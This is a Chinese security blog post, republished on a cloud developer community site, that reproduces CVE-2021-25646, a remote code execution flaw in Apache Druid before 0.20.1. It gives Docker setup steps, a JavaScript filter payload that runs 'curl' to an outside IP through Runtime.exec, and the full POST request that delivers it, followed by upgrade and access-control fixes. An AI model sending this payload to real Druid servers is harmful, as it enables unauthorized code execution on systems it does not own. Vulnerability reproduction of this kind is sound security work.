前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2021-25646:Apache Druid RCE复现

CVE-2021-25646:Apache Druid RCE复现

作者头像
Timeline Sec
发布2021-03-04 14:50:49
1.9K0
发布2021-03-04 14:50:49
举报
文章被收录于专栏:Timeline SecTimeline Sec

作者:DesM0nd@Timeline Sec

本文字数:997

阅读时长:2~3min

声明:请勿用作违法用途,否则后果自负

0x01 简介

Druid不仅是一个数据库连接池,还包含一个ProxyDriver、一系列内置的JDBC组件库、一个SQL Parser。

支持所有JDBC兼容的数据库,包括Oracle、MySql、Derby、Postgresql、SQL Server、H2等。

0x02 漏洞概述

编号:CVE-2021-25646 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。

0x03 影响版本

Apache Druid < 0.20.1

0x04 环境搭建

Apache Druid:0.16.0

代码语言:javascript
复制
参考现有的低版本druid
docker pull fokkodriesprong/docker-druid
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

0x05 漏洞复现

访问8888端口,进入Druid console

点击Load data -> Local disk

填入

Base directory:

quickstart/tutorial/

File filter:

wikiticker-2015-09-12-sampled.json.gz

一直点击next到filter项(设置步骤可参考:https://druid.apache.org/docs/latest/tutorials/index.html)

抓包修改filter为

代码语言:javascript
复制
{
    "type":"javascript",
    "function":"function(value){return java.lang.Runtime.getRuntime().exec('curl ip:8000')}",
    "dimension":"added",
    "":{
    "enabled":"true"
    }
}

对应post包为(执行的命令:curl ip:8000)

代码语言:javascript
复制
代码语言:javascript
复制
POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: tls.com:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 623
Origin: http://tls.com:8888
Connection: close
Referer: http://tls.com:8888/unified-console.html


{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('curl yourip:8000')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"cacheKey":"79a5be988bf94d42a6f219b63ff27383"}}

0x07 修复方式

升级Apache Druid 到最新的版本

对Apache Druid进行权限控制,只允许受信任的主机访问集群服务器

代码语言:javascript
复制
参考链接:

https://github.com/Fokko/docker-druid

https://druid.apache.org/docs/latest/tutorials/index.html

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-02-02,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档